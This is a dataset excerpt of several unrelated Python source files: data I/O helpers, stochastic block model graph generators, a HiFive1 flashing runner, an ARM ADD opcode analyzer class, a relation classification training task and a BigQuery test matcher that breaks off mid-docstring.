filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_0_25157
|
import numpy as np
def write_to_file_features(output_file, features):
"""
writes a data sample(matrix) to file
write whole dataset to file:
for i in range(dataset.shape[0]):
write_to_file_features("example.txt", dataset[i])
:param output_file: file to write to
:param features: data sample
"""
with open(output_file, 'a+') as file_stream:
for f in features:
for el in f:
file_stream.write(str(el))
file_stream.write(",")
file_stream.write('\n')
def write_to_file_labels(output_file, vector):
"""
write elements of a 1d vector to file
:param output_file: output file
:param vector: data to be written
"""
with open(output_file, 'w+') as file:
for item in vector:
file.write(str(item))
file.write('\n')
def features_from_file(input_file, num_features=20):
"""
extract mfcc features from file
:param input_file: feature file
:param num_features: feature count
:return: extracted features
"""
features_matrix = []
with open(input_file, 'r') as file_stream:
for matrix in file_stream:
matrix_str = matrix.strip("\n").split(",")
matrix_float = [float(matrix_str[i]) for i in range(len(matrix_str) - 1)]
matrix_float = np.array(matrix_float)
matrix_float = matrix_float.reshape(num_features, 35)
features_matrix.append(matrix_float)
return np.array(features_matrix)
def labels_from_file(input_file):
labels = []
with open(input_file, 'r') as file:
for line in file:
line = line.strip('\n')
labels.append(line)
return labels
def get_data_files(filepath, prefix, num_epochs, num_features=41,
model_type='lstm'):
"""
model folder of type: type_prefix_features
model file of type: prefix_features_epochs.model
means and stddev file of type: means/stddev_prefix_numfeatures.npy
"""
num_epochs = str(num_epochs)
num_features = str(num_features)
model_name = '_'.join([model_type, prefix, num_features])
model_file = model_name + '_' + num_epochs + ".model"
model_path = filepath + model_name + "/"
means_file = '_'.join(["means", prefix, num_features]) + ".npy"
stddevs_file = '_'.join(["stddev", prefix, num_features]) + ".npy"
means_file = model_path + means_file
stddevs_file = model_path + stddevs_file
model_file = model_path + model_file
return model_file, means_file, stddevs_file
def add_history(filepath, history_train, history_valid, metrics):
"""
add to history from metrics collected on train, test data
:param filepath:
:param metrics: metrics to save to the file
:param history_train: dict containing training metrics per epoch
:param history_valid: tuple containig validation metrics per epoch
"""
for i in range(len(metrics)):
with open(filepath + "_" + metrics[i], "a+") as file:
file.write(str(history_train[metrics[i]][0]))
file.write(" ")
file.write(str(history_valid[i]))
file.write('\n')
def load_metric(filepath):
"""
load the metric data from a file
:param filepath: file to store metric data
:return: np array containing metric data of type (train, validation)
"""
history = list()
with open(filepath, 'r') as file:
for line in file:
values = [np.float(i) for i in line.strip(" \n").split(" ")]
values = np.asarray(values)
history.append(values)
return np.asarray(history)
def concat_files(dirpath, filenames, out_file, lines_per_file=-1):
"""
concatenate multiple files into a single one
:param dirpath: path to the files
:param filenames: the list of filenames to concatenate
:param out_file: where to store the concatenated data
:param lines_per_file: how many lines to take from each file
"""
if dirpath[-1] != '/':
dirpath = dirpath + '/'
out_path = dirpath + out_file
if lines_per_file == -1:
lines_per_file = 2 ** 20
with open(out_path, 'w') as outfile:
for filename in filenames:
count = 0
file_path = dirpath + filename
with open(file_path) as infile:
for line in infile:
if line != "" and count < lines_per_file:
outfile.write(line)
count += 1
elif count >= lines_per_file:
break
|
the-stack_0_25158
|
# --------------------------------------------------------------------------------
# Copyright (c) 2017-2020, Daniele Zambon, All rights reserved.
#
# Implements models derived by the degree-corrected stochastic block model.
# --------------------------------------------------------------------------------
import numpy as np
from .graph import Graph
from functools import reduce
class DegreeCorrectedStochasticBlockModel(object):
"""
Wilson, James D., Nathaniel T. Stevens, and William H. Woodall. ``Modeling and estimating change in temporal
networks via a dynamic degree corrected stochastic block model.'' arXiv preprint arXiv:1605.04049 (2016).
"""
def __init__(self, communities, prob_matrix, theta=None, delta=None):
"""
:param communities: (list of lists) partition of set {0, ..., n-1}
:param prob_matrix: (np.ndarray(no_communities, no_communities)) inter- and intra-community link propensity
:param theta: (np.ndarray(no_nodes,)) degree correction
:param delta: (np.ndarray(no_communities,)) parameters to generate random theta
"""
# Nodes
node_set = sorted(reduce((lambda x, y: x + y), communities))
assert (np.arange(len(node_set)) == np.array(
node_set)).all(), "communities is not a partition of {0, 1, ..., n-1}"
self.no_vertices = len(node_set)
# Communities
self.communities = [np.array(c) for c in communities]
self.no_communities = len(self.communities)
membership_onehot = np.zeros((self.no_vertices, self.no_communities), dtype=int)
for ci, c in enumerate(self.communities):
membership_onehot[c, ci] = 1
# Community link probabilities
self.probabilities = prob_matrix if isinstance(prob_matrix, np.ndarray) else np.array(prob_matrix)
assert self.probabilities.ndim == 2
assert self.probabilities.shape[0] == self.probabilities.shape[1]
assert self.probabilities.shape[0] == self.no_communities
assert (self.probabilities == self.probabilities.T).all()
# Degree corrections
self.theta = theta if theta is not None else self._generate_theta(delta)
Theta_mat = np.dot(self.theta.reshape(-1, 1), self.theta.reshape(1, -1))
# Expected adjacency matrix
self.expected_adj = membership_onehot.dot(self.probabilities).dot(membership_onehot.T)
self.expected_adj *= Theta_mat
def _generate_theta(self, delta):
""" Generates theta from delta. """
theta = np.ones(self.no_vertices)
if delta is None:
pass
else:
delta_ar = delta if isinstance(delta, np.ndarray) else np.array(delta)
if delta_ar.ndim == 1:
delta_ar = delta_ar.reshape(-1, 1)
delta_ar = np.hstack([delta_ar] * 2)
elif delta_ar.shape[1] < 2:
delta_ar = np.vstack([delta_ar] * 2)
assert delta_ar.ndim ==2 and delta_ar.shape[1] == 2
assert np.all(delta_ar >= 0.)
for r, cr in enumerate(self.communities):
theta[cr] += np.random.uniform(low=-delta_ar[r, 0], high=delta_ar[r, 1], size=len(cr))
theta[cr] *= len(cr) / np.sum(theta[cr])
return theta
def get(self, no_graphs=1, distrib="poisson", format="cdg"):
"""
Generates a set of graphs from the model.
:param no_graphs: (int)
:param distrib: (str in {"poisson", "uniform"})
:param format: (str, def="cdg")
:return: a list of `no_graphs` instances of cdg.graph.Graph
"""
if distrib == "poisson":
rand_vals = np.random.poisson(lam=self.expected_adj,
size=(no_graphs, self.no_vertices, self.no_vertices))
else:
rand_vals = np.random.rand(no_graphs, self.no_vertices, self.no_vertices)
for n in range(no_graphs):
rand_vals[n] = np.tril(rand_vals[n], -1) + np.tril(rand_vals[n], -1).T + np.eye(self.no_vertices)
if distrib == "poisson":
adjmat = rand_vals > 0
ef = rand_vals[..., None]
else:
adjmat = rand_vals <= self.expected_adj[None, ...]
ef = [None] * no_graphs
adjmat = adjmat.astype(int)
nf = [None] * no_graphs
if format == 'npy':
return adjmat, nf, ef
else:
return [Graph(adjmat[i], nf[i], ef[i]) for i in range(no_graphs)]
class StochasticBlockModel(DegreeCorrectedStochasticBlockModel):
"""
P. W. Holland, K. B. Laskey, and S. Leinhardt, ``Stochastic blockmodels: First steps'', Social Networks, vol. 5,
no. 2, pp. 109–137, 19
"""
def __init__(self, communities, prob_matrix):
super().__init__(communities=communities,
prob_matrix=prob_matrix,
delta=None)
def get(self, no_graphs=1, distrib="uniform", format="cdg"):
return super().get(no_graphs=no_graphs, distrib=distrib, format=format)
class ErdosRenyiModel(StochasticBlockModel):
def __init__(self, no_vertices, prob_edge):
super().__init__(communities=[list(range(no_vertices))], prob_matrix=[[prob_edge]])
class DynamicsGenerator(object):
def __init__(self, alpha, getter):
assert alpha <= 1. and alpha > 0
self.alpha = alpha # Continuity parameter
self.getter = getter
def get(self, graph_seed=None, no_graphs=1):
"""
Generates a set of graphs from the model.
:param no_graphs: (int)
:param graph_seed: (cdg.Graph, def=False)
:return: a list of `no_graphs` instances of cdg.graph.Graph
"""
graph_0 = self.getter() if graph_seed is None else graph_seed
G = [graph_0]
for _ in range(no_graphs - 1):
rand_mat = np.random.rand(*(graph_0.adj.shape)) / 2.
rand_mat += rand_mat.T
mask_e = np.where(rand_mat > self.alpha)
mask_n = np.where(np.diag(rand_mat) > self.alpha)
graph_1 = self.getter()
graph_1.adj[mask_e] = graph_0.adj[mask_e]
graph_1.ef[mask_e] = graph_0.ef[mask_e]
graph_1.nf[mask_n] = graph_0.nf[mask_n]
G.append(graph_1)
graph_0 = graph_1
return G
|
the-stack_0_25159
|
# Copyright (c) 2019, Timon Baetz
#
# SPDX-License-Identifier: Apache-2.0
'''HiFive1-specific (flash only) runner.'''
from os import path
from runners.core import ZephyrBinaryRunner, RunnerCaps
class HiFive1BinaryRunner(ZephyrBinaryRunner):
'''Runner front-end for the HiFive1 board, using openocd.'''
def __init__(self, cfg):
super().__init__(cfg)
self.openocd_config = path.join(cfg.board_dir, 'support', 'openocd.cfg')
@classmethod
def name(cls):
return 'hifive1'
@classmethod
def capabilities(cls):
return RunnerCaps(commands={'flash'})
@classmethod
def do_add_parser(cls, parser):
pass
@classmethod
def do_create(cls, cfg, args):
if cfg.gdb is None:
raise ValueError('--gdb not provided at command line')
return HiFive1BinaryRunner(cfg)
def do_run(self, command, **kwargs):
self.require(self.cfg.openocd)
self.require(self.cfg.gdb)
openocd_cmd = ([self.cfg.openocd, '-f', self.openocd_config])
gdb_cmd = ([self.cfg.gdb, self.cfg.elf_file, '--batch',
'-ex', 'set remotetimeout 240',
'-ex', 'target extended-remote localhost:3333',
'-ex', 'load',
'-ex', 'quit'])
self.run_server_and_client(openocd_cmd, gdb_cmd)
|
the-stack_0_25160
|
# ------------------------------------------------------------------------------
# CodeHawk Binary Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2021-2022 Aarno Labs LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from typing import cast, List, TYPE_CHECKING
from chb.app.InstrXData import InstrXData
from chb.app.AbstractSyntaxTree import AbstractSyntaxTree
from chb.app.ASTNode import ASTExpr, ASTInstruction
from chb.arm.ARMDictionaryRecord import armregistry
from chb.arm.ARMOpcode import ARMOpcode, simplify_result
from chb.arm.ARMOperand import ARMOperand
import chb.invariants.XXprUtil as XU
import chb.util.fileutil as UF
from chb.util.IndexedTable import IndexedTableValue
if TYPE_CHECKING:
import chb.arm.ARMDictionary
from chb.invariants.XXpr import XprCompound, XprConstant
@armregistry.register_tag("ADD", ARMOpcode)
class ARMAdd(ARMOpcode):
"""Add (register, constant)
ADD{S}<c> <Rd>, <Rn>, <Rm>{, <shift>} (arm)
ADD{S}<c> <Rd>, <Rn>, #<const> (arm, thumb)
ADD{S}<c>.W <Rd>, <Rn>, #<const> (thumb)
ADD{S}<c> <Rdn>, #<const> (thumb)
ADD<c> <Rdn>, <Rm> (thumb)
ADD<c> SP, <Rm> (thumb)
ADD<c> <Rd>, SP, #<const> (thumb)
ADD<c> SP, SP, #<const> (thumb)
ADD<c> <Rdm>, SP, <Rdm> (thumb)
tags[1]: <c>
args[0]: {S}
args[1]: index of op1 in armdictionary
args[2]: index of op2 in armdictionary
args[3]: index of op3 in armdictionary
args[4]: is-wide (thumb)
"""
def __init__(
self,
d: "chb.arm.ARMDictionary.ARMDictionary",
ixval: IndexedTableValue) -> None:
ARMOpcode.__init__(self, d, ixval)
self.check_key(2, 5, "Add")
@property
def operands(self) -> List[ARMOperand]:
return [self.armd.arm_operand(i) for i in self.args[1:-1]]
@property
def writeback(self) -> bool:
return self.args[0] == 1
def mnemonic_extension(self) -> str:
wb = "S" if self.writeback else ""
cc = ARMOpcode.mnemonic_extension(self)
return wb + cc
def annotation(self, xdata: InstrXData) -> str:
"""xdata format: a:vxxxx .
vars[0]: lhs (Rd)
xprs[0]: rhs1 (Rn)
xprs[1]: rhs2 (Rm{..})
xprs[2]: rhs1 + rhs2 (syntactic)
xprs[3]: rhs1 + rhs2 (simplified)
"""
lhs = str(xdata.vars[0])
result = xdata.xprs[2]
rresult = xdata.xprs[3]
xresult = simplify_result(xdata.args[3], xdata.args[4], result, rresult)
return lhs + " := " + xresult
def assembly_ast(
self,
astree: AbstractSyntaxTree,
iaddr: str,
bytestring: str,
xdata: InstrXData) -> List[ASTInstruction]:
annotations: List[str] = [iaddr, "ADD"]
(lhs, _, _) = self.operands[0].ast_lvalue(astree)
(op1, _, _) = self.operands[1].ast_rvalue(astree)
(op2, _, _) = self.operands[2].ast_rvalue(astree)
binop = astree.mk_binary_op("plus", op1, op2)
result = astree.mk_assign(lhs, binop, annotations=annotations)
astree.add_instruction_span(result.id, iaddr, bytestring)
return [result]
def ast(self,
astree: AbstractSyntaxTree,
iaddr: str,
bytestring: str,
xdata: InstrXData) -> List[ASTInstruction]:
lhs = xdata.vars[0]
rhs1 = str(xdata.xprs[0])
rhs2 = xdata.xprs[1]
rhs3 = xdata.xprs[3]
if lhs == "SP" and rhs1 == "SP" and rhs2.is_constant:
return []
annotations: List[str] = [iaddr, "ADD"]
lhsasts = XU.xvariable_to_ast_lvals(lhs, astree)
if len(lhsasts) != 1:
raise UF.CHBError("ARMAdd: multiple lvals in ast")
lhsast = lhsasts[0]
if rhs1 == "SP" and rhs3.is_stack_address:
rhs3 = cast("XprCompound", rhs3)
stackoffset = rhs3.stack_address_offset()
rhslval = astree.mk_stack_variable_lval(stackoffset)
rhsast: ASTExpr = astree.mk_address_of(rhslval)
elif rhs1 == "PC" or str(rhs2) == "PC":
annotations.append("PC-relative")
if rhs3.is_int_constant:
rhsval = cast("XprConstant", rhs3).intvalue
rhsast = astree.mk_integer_constant(rhsval)
else:
rhsasts = XU.xxpr_to_ast_exprs(rhs3, astree)
if len(rhsasts) == 1:
rhsast = rhsasts[0]
else:
raise UF.CHBError(
"ARMAdd: multiple expressions in ast")
else:
return self.assembly_ast(astree, iaddr, bytestring, xdata)
result = astree.mk_assign(lhsast, rhsast, annotations=annotations)
astree.add_instruction_span(result.id, iaddr, bytestring)
return [result]
|
the-stack_0_25162
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains base implementation for relation classification tasks."""
from typing import Any, Callable, Dict, Optional, Text, Tuple
import flax.linen as nn
import jax.numpy as jnp
from language.mentionmemory.encoders import encoder_registry
from language.mentionmemory.modules import mlp
from language.mentionmemory.tasks import downstream_encoder_task
from language.mentionmemory.tasks import task_registry
from language.mentionmemory.utils import default_values
from language.mentionmemory.utils import jax_utils as jut
from language.mentionmemory.utils import metric_utils
from language.mentionmemory.utils.custom_types import Array, Dtype, MetricGroups # pylint: disable=g-multiple-import
import language.mentionmemory.utils.mention_preprocess_utils as mention_preprocess_utils
import ml_collections
import numpy as np
import tensorflow.compat.v2 as tf
class RelationClassifierModel(nn.Module):
"""Encoder wrapper with classification layer for relation classification.
This model takes mention-annotated text with special mentions per sample
denoted as "subject" and "object". The model generates mention encodings for
these two mentions, concatenates them and applies (potentially, multi-layer)
n-ary classification layers.
Attributes:
num_classes: number of classification labels.
num_layers: number of classification MLP layers on top of mention encodings.
input_dim: input dimensionality of classification MLP layers. This must be
equal to 2 * mention encodings size.
hidden_dim: hidden dimensionality of classification MLP layers.
dropout_rate: dropout rate of classification MLP layers.
encoder_name: name of encoder model to use to encode passage.
encoder_config: encoder hyperparameters.
dtype: precision of computation.
mention_encodings_feature: feature name for encodings of target mentions.
"""
num_classes: int
num_layers: int
input_dim: int
hidden_dim: int
dropout_rate: float
encoder_name: str
encoder_config: ml_collections.FrozenConfigDict
dtype: Dtype
mention_encodings_feature: str = 'target_mention_encodings'
layer_norm_epsilon: float = default_values.layer_norm_epsilon
def setup(self):
self.encoder = encoder_registry.get_registered_encoder(
self.encoder_name)(**self.encoder_config)
self.classification_mlp_layers = [
mlp.MLPBlock( # pylint: disable=g-complex-comprehension
input_dim=self.input_dim,
hidden_dim=self.hidden_dim,
dropout_rate=self.dropout_rate,
dtype=self.dtype,
layer_norm_epsilon=self.layer_norm_epsilon,
) for _ in range(self.num_layers)
]
self.linear_classifier = nn.Dense(self.num_classes, dtype=self.dtype)
def __call__(self, batch: Dict[str, Array], deterministic: bool):
_, loss_helpers, logging_helpers = self.encoder.forward(
batch, deterministic)
mention_encodings = loss_helpers[self.mention_encodings_feature]
subject_mention_encodings = jut.matmul_slice(
mention_encodings, batch['mention_subject_indices'])
object_mention_encodings = jut.matmul_slice(mention_encodings,
batch['mention_object_indices'])
relation_encodings = jnp.concatenate(
[subject_mention_encodings, object_mention_encodings], -1)
for mlp_layer in self.classification_mlp_layers:
relation_encodings = mlp_layer(relation_encodings, deterministic)
classifier_logits = self.linear_classifier(relation_encodings)
loss_helpers['classifier_logits'] = classifier_logits
return loss_helpers, logging_helpers
@task_registry.register_task('relation_classifier')
class RelationClassifierTask(downstream_encoder_task.DownstreamEncoderTask):
"""Class for relation classification task."""
model_class = RelationClassifierModel
@classmethod
def make_loss_fn(
cls, config: ml_collections.ConfigDict
) -> Callable[..., Tuple[float, MetricGroups, Dict[str, Any]]]:
"""Creates loss function for Relation Classifier training.
TODO(urikz): Write detailed description.
Args:
config: task configuration.
Returns:
Loss function.
"""
ignore_label = config.ignore_label
def loss_fn(
model_config: ml_collections.FrozenConfigDict,
model_params: Dict[Text, Any],
model_vars: Dict[Text, Any],
batch: Dict[Text, Any],
deterministic: bool,
dropout_rng: Optional[Dict[Text, Array]] = None,
) -> Tuple[float, MetricGroups, Dict[str, Any]]:
"""Loss function used by Relation Classifier task. See BaseTask."""
variable_dict = {'params': model_params}
variable_dict.update(model_vars)
loss_helpers, _ = cls.build_model(model_config).apply(
variable_dict, batch, deterministic=deterministic, rngs=dropout_rng)
weights = jnp.ones_like(batch['classifier_target'])
loss, denom = metric_utils.compute_weighted_cross_entropy(
loss_helpers['classifier_logits'], batch['classifier_target'],
weights)
acc, _ = metric_utils.compute_weighted_accuracy(
loss_helpers['classifier_logits'], batch['classifier_target'],
weights)
predictions = jnp.argmax(loss_helpers['classifier_logits'], axis=-1)
tp, fp, fn = metric_utils.compute_tp_fp_fn_weighted(
predictions, batch['classifier_target'], weights, ignore_label)
metrics = {
'agg': {
'loss': loss,
'denominator': denom,
'acc': acc,
},
'micro_precision': {
'value': tp,
'denominator': tp + fp,
},
'micro_recall': {
'value': tp,
'denominator': tp + fn,
}
}
auxiliary_output = {'predictions': predictions}
auxiliary_output.update(cls.get_auxiliary_output(loss_helpers))
return loss, metrics, auxiliary_output
return loss_fn
@staticmethod
def make_collater_fn(
config: ml_collections.ConfigDict
) -> Callable[[Dict[Text, tf.Tensor]], Dict[Text, tf.Tensor]]:
"""Produces function to preprocess batches for relation classification task.
This function samples and flattens mentions from input data.
Args:
config: task configuration.
Returns:
collater function.
"""
encoder_config = config.model_config.encoder_config
bsz = config.per_device_batch_size
max_batch_mentions = config.max_mentions * bsz
n_candidate_mentions = config.max_mentions_per_sample * bsz
if config.max_mentions < 2:
raise ValueError('Need at least two mentions per sample in order to '
'include object and subject mentions.')
def collater_fn(batch: Dict[Text, tf.Tensor]) -> Dict[Text, tf.Tensor]:
"""Collater function for relation classification task. See BaseTask."""
def flatten_bsz(tensor):
return tf.reshape(tensor, [bsz])
new_batch = {
'text_ids': batch['text_ids'],
'text_mask': batch['text_mask'],
'classifier_target': flatten_bsz(batch['target']),
}
# Sample mentions across batch
# We want to make sure that the subject / object mentions always have
# priority when we sample `max_batch_mentions` out of all available
# mentions. Additionally, we want these subject / object mentions to be
# in the same order as their samples. In other words, we want the first
# sampled mention to be object mention from the first sample, the second
# sampled mention to be subject mention from the first sample, the third
# sampled mention to be object mention from the second sample, etc.
subj_index = flatten_bsz(batch['subject_mention_indices'])
obj_index = flatten_bsz(batch['object_mention_indices'])
# Adjust subject / object mention positions in individual samples to their
# positions in flattened mentions.
shift = tf.range(
bsz, dtype=obj_index.dtype) * config.max_mentions_per_sample
mention_target_indices = tf.reshape(
tf.stack([subj_index + shift, obj_index + shift], axis=1), [-1])
# Sample the rest of the mentions uniformly across batch
scores = tf.random.uniform(shape=tf.shape(batch['mention_mask']))
scores = scores * tf.cast(batch['mention_mask'], tf.float32)
# We want to adjust scores for target mentions so they don't get sampled
# for the second time. We achive this by making their scores negative.
def set_negative_scores(scores, indices):
indices_2d = tf.stack([tf.range(bsz, dtype=indices.dtype), indices],
axis=1)
return tf.tensor_scatter_nd_update(scores, indices_2d,
tf.fill(tf.shape(indices), -1.0))
# Note that since we're using 2D scores (not yet flattened for simplicity)
# we use unadjusted `subj_index` and `obj_index`.
scores = set_negative_scores(scores, subj_index)
scores = set_negative_scores(scores, obj_index)
# There are `2 * bsz` target mentions which were already chosen
num_to_sample = tf.maximum(max_batch_mentions - 2 * bsz, 0)
sampled_scores, sampled_indices = tf.math.top_k(
tf.reshape(scores, [-1]), num_to_sample, sorted=True)
# Note that negative scores indicate that we have double-sampled some of
# the target mentions (we set their scores to negative right above).
# In this case, we remove them.
num_not_double_sampled = tf.reduce_sum(
tf.cast(tf.not_equal(sampled_scores, -1), tf.int32))
sampled_indices = sampled_indices[:num_not_double_sampled]
# Combine target mentions (subject / object) with sampled mentions
mention_target_indices = tf.cast(mention_target_indices,
sampled_indices.dtype)
sampled_indices = tf.concat([mention_target_indices, sampled_indices],
axis=0)
sampled_indices = mention_preprocess_utils.dynamic_padding_1d(
sampled_indices, max_batch_mentions)
dtype = batch['mention_start_positions'].dtype
mention_mask = tf.reshape(batch['mention_mask'], [n_candidate_mentions])
new_batch['mention_mask'] = tf.gather(mention_mask, sampled_indices)
new_batch['mention_start_positions'] = tf.gather(
tf.reshape(batch['mention_start_positions'], [n_candidate_mentions]),
sampled_indices)
new_batch['mention_end_positions'] = tf.gather(
tf.reshape(batch['mention_end_positions'], [n_candidate_mentions]),
sampled_indices)
new_batch['mention_batch_positions'] = tf.gather(
tf.repeat(tf.range(bsz, dtype=dtype), config.max_mentions_per_sample),
sampled_indices)
new_batch['mention_target_indices'] = tf.range(2 * bsz, dtype=dtype)
new_batch['mention_subject_indices'] = tf.range(bsz, dtype=dtype) * 2
new_batch['mention_object_indices'] = tf.range(bsz, dtype=dtype) * 2 + 1
if config.get('max_length_with_entity_tokens') is not None:
batch_with_entity_tokens = mention_preprocess_utils.add_entity_tokens(
text_ids=new_batch['text_ids'],
text_mask=new_batch['text_mask'],
mention_mask=new_batch['mention_mask'],
mention_batch_positions=new_batch['mention_batch_positions'],
mention_start_positions=new_batch['mention_start_positions'],
mention_end_positions=new_batch['mention_end_positions'],
new_length=config.max_length_with_entity_tokens,
)
# Update `text_ids`, `text_mask`, `mention_mask`, `mention_*_positions`
new_batch.update(batch_with_entity_tokens)
# Update `max_length`
max_length = config.max_length_with_entity_tokens
else:
max_length = encoder_config.max_length
new_batch['mention_target_batch_positions'] = tf.gather(
new_batch['mention_batch_positions'],
new_batch['mention_target_indices'])
new_batch['mention_target_start_positions'] = tf.gather(
new_batch['mention_start_positions'],
new_batch['mention_target_indices'])
new_batch['mention_target_end_positions'] = tf.gather(
new_batch['mention_end_positions'],
new_batch['mention_target_indices'])
new_batch['mention_target_weights'] = tf.ones(2 * bsz)
# Fake IDs -- some encoders (ReadTwice) need them
new_batch['mention_target_ids'] = tf.zeros(2 * bsz)
new_batch['segment_ids'] = tf.zeros_like(new_batch['text_ids'])
position_ids = tf.expand_dims(tf.range(max_length), axis=0)
new_batch['position_ids'] = tf.tile(position_ids, (bsz, 1))
return new_batch
return collater_fn
@staticmethod
def get_name_to_features(
config: ml_collections.ConfigDict) -> Dict[Text, Any]:
"""Return feature dict for decoding purposes. See BaseTask for details."""
encoder_config = config.model_config.encoder_config
max_length = encoder_config.max_length
name_to_features = {
'text_ids':
tf.io.FixedLenFeature(max_length, tf.int64),
'text_mask':
tf.io.FixedLenFeature(max_length, tf.int64),
'target':
tf.io.FixedLenFeature(1, tf.int64),
'mention_start_positions':
tf.io.FixedLenFeature(config.max_mentions_per_sample, tf.int64),
'mention_end_positions':
tf.io.FixedLenFeature(config.max_mentions_per_sample, tf.int64),
'mention_mask':
tf.io.FixedLenFeature(config.max_mentions_per_sample, tf.int64),
'subject_mention_indices':
tf.io.FixedLenFeature(1, tf.int64),
'object_mention_indices':
tf.io.FixedLenFeature(1, tf.int64),
}
return name_to_features
@staticmethod
def dummy_input(config: ml_collections.ConfigDict) -> Dict[Text, Any]:
"""Produces model-specific dummy input batch. See BaseTask for details."""
if config.get('max_length_with_entity_tokens') is not None:
max_length = config.max_length_with_entity_tokens
else:
max_length = config.model_config.encoder_config.max_length
bsz = config.per_device_batch_size
text_shape = (bsz, max_length)
mention_shape = (config.max_mentions)
mention_target_shape = (2 * bsz)
int_type = jnp.int32
position_ids = np.arange(max_length)
position_ids = np.tile(position_ids, (bsz, 1))
dummy_input = {
'text_ids':
jnp.ones(text_shape, int_type),
'text_mask':
jnp.ones(text_shape, int_type),
'position_ids':
jnp.asarray(position_ids, int_type),
'segment_ids':
jnp.zeros(text_shape, int_type),
'classifier_target':
jnp.ones((bsz,), int_type),
'mention_start_positions':
jnp.zeros(mention_shape, int_type),
'mention_end_positions':
jnp.zeros(mention_shape, int_type),
'mention_mask':
jnp.ones(mention_shape, int_type),
'mention_batch_positions':
jnp.ones(mention_shape, int_type),
'mention_target_indices':
jnp.arange(mention_target_shape, dtype=int_type),
'mention_target_weights':
jnp.ones(mention_target_shape, dtype=int_type),
'mention_object_indices':
jnp.arange(bsz, dtype=int_type),
'mention_subject_indices':
jnp.arange(bsz, dtype=int_type),
'mention_target_batch_positions':
jnp.arange(mention_target_shape, dtype=int_type),
'mention_target_start_positions':
jnp.zeros(mention_target_shape, int_type),
'mention_target_end_positions':
jnp.zeros(mention_target_shape, int_type),
'mention_target_ids':
jnp.zeros(mention_target_shape, int_type),
}
return dummy_input
|
the-stack_0_25163
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Bigquery data verifier for end-to-end test."""
# pytype: skip-file
from __future__ import absolute_import
import concurrent
import logging
import sys
import time
from hamcrest.core.base_matcher import BaseMatcher
from apache_beam.io.gcp import bigquery_tools
from apache_beam.testing.test_utils import compute_hash
from apache_beam.testing.util import BeamAssertException
from apache_beam.testing.util import equal_to
from apache_beam.utils import retry
__all__ = ['BigqueryMatcher', 'BigQueryTableMatcher']
# Protect against environments where bigquery library is not available.
# pylint: disable=wrong-import-order, wrong-import-position
try:
from google.cloud import bigquery
from google.cloud.exceptions import GoogleCloudError
except ImportError:
bigquery = None
# pylint: enable=wrong-import-order, wrong-import-position
MAX_RETRIES = 5
_LOGGER = logging.getLogger(__name__)
def retry_on_http_timeout_and_value_error(exception):
"""Filter allowing retries on Bigquery errors and value error."""
return isinstance(
exception,
(GoogleCloudError, ValueError, concurrent.futures.TimeoutError))
class BigqueryMatcher(BaseMatcher):
"""Matcher that verifies the checksum of Bigquery data with given query.
Fetch Bigquery data with given query, compute a hash string and compare
with expected checksum.
"""
def __init__(self, project, query, checksum):
"""Initialize BigQueryMatcher object.
Args:
project: The name (string) of the project.
query: The query (string) to perform.
checksum: SHA-1 hash generated from a sorted list of lines
read from expected output.
"""
if bigquery is None:
raise ImportError('Bigquery dependencies are not installed.')
if not query or not isinstance(query, str):
raise ValueError('Invalid argument: query. Please use non-empty string')
if not checksum or not isinstance(checksum, str):
raise ValueError(
'Invalid argument: checksum. Please use non-empty string')
self.project = project
self.query = query
self.expected_checksum = checksum
self.checksum = None
def _matches(self, _):
if self.checksum is None:
response = self._query_with_retry()
_LOGGER.info(
'Read from given query (%s), total rows %d',
self.query,
len(response))
self.checksum = compute_hash(response)
_LOGGER.info('Generate checksum: %s', self.checksum)
return self.checksum == self.expected_checksum
@retry.with_exponential_backoff(
num_retries=MAX_RETRIES,
retry_filter=retry_on_http_timeout_and_value_error)
def _query_with_retry(self):
"""Run Bigquery query with retry if got error http response"""
_LOGGER.info('Attempting to perform query %s to BQ', self.query)
# Create client here since it throws an exception if pickled.
bigquery_client = bigquery.Client(self.project)
query_job = bigquery_client.query(self.query)
rows = query_job.result(timeout=60)
return [row.values() for row in rows]
def describe_to(self, description):
description \
.append_text("Expected checksum is ") \
.append_text(self.expected_checksum)
def describe_mismatch(self, pipeline_result, mismatch_description):
mismatch_description \
.append_text("Actual checksum is ") \
.append_text(self.checksum)
class BigqueryFullResultMatcher(BigqueryMatcher):
"""Matcher that verifies Bigquery data with given query.
Fetch Bigquery data with given query, compare to the expected data.
"""
def __init__(self, project, query, data):
"""Initialize BigQueryMatcher object.
Args:
